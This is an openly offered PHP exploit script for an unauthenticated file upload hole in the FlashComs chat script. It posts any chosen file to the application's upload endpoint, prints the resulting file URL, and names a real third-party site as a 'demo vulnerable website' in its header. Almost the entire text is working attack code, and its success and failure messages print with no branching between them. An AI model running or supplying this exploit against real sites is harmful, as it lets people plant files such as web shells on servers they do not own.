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* FlashComs Chat Script File Upload Exploit
* Written by miyachung
* Date: 29.11.2013 , 13:38 AM
* Thanks to all janissaries members(burtay,KýLýCaRsLaN,TheMirkin,eno7,3spi0n,n4ss,mmxm,Michelony)
* Demo vulnerable website: http://www.npua.org/flashcoms/
* php exploit.php -u www.npua.org/flashcoms -f myfile.txt
$options = getopt('u:f:');
if(!isset($options['u'],$options['f'])) die("\nHow to use: php $_SERVER[PHP_SELF] -u URL -f FILE_TO_UPLOAD\nExample: php $_SERVER[PHP_SELF] -u www.example.com/paths -f myfile.txt\n");
$handle = curl_init();
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_URL, "http://".$options['u']."/common/server/php/file.php?action=upload");
curl_setopt($handle, CURLOPT_POSTFIELDS,array("Filedata" => "@".$options['f']."","fileId" => $options["f"]));
$result = curl_exec($handle);
echo "\n_____________________________________________________________________\n";
echo "\t[+] Exploitation success!!\n";
echo "\t[+] http://$options[u]/files/$options[f]\n";
echo "_____________________________________________________________________\n";
echo "\n[-] Target is not exploitable\n";
preg_match('#msg="(.*?)" />#si',$result,$msg);
echo "[-] Message: ".$msg[1]."\n";